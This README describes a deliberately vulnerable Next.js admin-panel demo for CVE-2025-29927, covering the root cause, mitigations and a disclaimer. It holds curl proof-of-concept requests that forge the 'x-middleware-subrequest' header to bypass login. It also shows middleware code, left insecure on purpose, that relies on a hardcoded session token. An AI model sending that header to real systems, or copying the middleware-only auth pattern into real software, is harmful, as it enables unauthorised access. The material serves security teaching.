## https://sploitus.com/exploit?id=E8866072-1C2E-5A61-B961-08F3A47A4FA0
# Himalaya Tech Admin Panel โ CVE-2025-29927 Demo
> **WARNING: This application is intentionally vulnerable. For educational and authorized
> security research purposes only. Do NOT deploy to a public server.**
---
## About This Demo
This app demonstrates **CVE-2025-29927**, a critical authentication bypass vulnerability in
Next.js middleware (CVSS 9.1). The application simulates a realistic corporate admin panel for
the fictional company "Himalaya Tech Pvt. Ltd." โ making the impact of the bypass visually
compelling.
All employee records, API keys, database credentials, and other "sensitive" data shown are
**entirely fictional and mock** โ generated for educational demonstration only.
---
## CVE-2025-29927 โ Vulnerability Summary
| Field | Detail |
|--------------|---------------------------------------------------------------------|
| CVE ID | CVE-2025-29927 |
| Severity | Critical (CVSS 9.1) |
| Affected | Next.js โค 14.2.29, Next.js โค 15.2.2 |
| Fixed in | Next.js 14.2.30, 15.2.3 |
| Type | Middleware authentication bypass via HTTP header manipulation |
### Root Cause
Next.js uses an internal HTTP header `x-middleware-subrequest` to track recursive middleware
calls and prevent infinite loops. In vulnerable versions, an attacker can **forge this header**
in an external request. When the header is present and matches the middleware's identifier,
the Next.js runtime **skips the middleware entirely**, including all authentication logic
defined within it.
### Impact
Any application that relies solely on `middleware.ts` to protect routes (a common and
recommended Next.js pattern) is vulnerable. An unauthenticated attacker can access any
protected page by simply adding one HTTP header.
---
## Proof of Concept
### Normal request (blocked โ redirects to /login)
```bash
curl -v http://localhost:3000/admin
# โ 307 Redirect to /login
```
### Bypass request (succeeds โ returns full admin page)
```bash
curl -v \
-H "x-middleware-subrequest: middleware" \
http://localhost:3000/admin
# โ 200 OK โ full admin dashboard HTML returned, no authentication required
```
### Accessing nested protected routes
```bash
# Admin users page
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users
# System settings with "production credentials"
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings
```
### Using a browser (via Burp Suite / browser extension)
Add the request header `x-middleware-subrequest: middleware` to any request to `/admin/*`
and the middleware check will be skipped.
---
## Why This App Is Vulnerable
`middleware.ts` is the **sole** protection mechanism:
```typescript
// middleware.ts
export function middleware(request: NextRequest) {
if (pathname.startsWith("/admin")) {
const token = request.cookies.get("auth-token")?.value;
if (!token || token !== "valid-session-xyz123") {
return NextResponse.redirect(loginUrl); // โ this entire function is skipped
}
}
return NextResponse.next();
}
```
The page components themselves (e.g. `app/admin/page.tsx`) contain **no auth checks** โ
intentionally, to mirror real-world applications that follow the middleware-only protection
pattern.
---
## Setup & Running
### Prerequisites
- Node.js 18+
- npm or yarn
### Install
```bash
npm install
```
### Run development server
```bash
npm run dev
```
The app will be available at `http://localhost:3000`.
### Routes
| Route | Auth Required | Description |
|-------------------|--------------|--------------------------------------|
| `/` | No | Public landing page |
| `/login` | No | Login form |
| `/admin` | Yes* | Admin dashboard with sensitive data |
| `/admin/users` | Yes* | User management |
| `/admin/settings` | Yes* | System settings & credentials |
*Protected by middleware only โ bypassed by CVE-2025-29927.
### Demo credentials (normal login flow)
- Email: `admin@himalayatech.com`
- Password: `Admin@2024`
---
## Mitigation
1. **Upgrade Next.js** to 14.2.30+ or 15.2.3+.
2. **Defense in depth**: Add server-side auth checks inside page components/route handlers,
not only in middleware. Middleware should be treated as a UX optimization, not a security
boundary.
3. **Strip the header** at your reverse proxy/CDN before requests reach Next.js.
---
## Disclaimer
This application is provided for **educational purposes only**, specifically for demonstrating
the real-world impact of CVE-2025-29927 in an ethical security course context. All data
(employee records, API keys, credentials) is **entirely fictional**. Do not use this demo
application or the techniques demonstrated here against systems you do not own or have
explicit permission to test.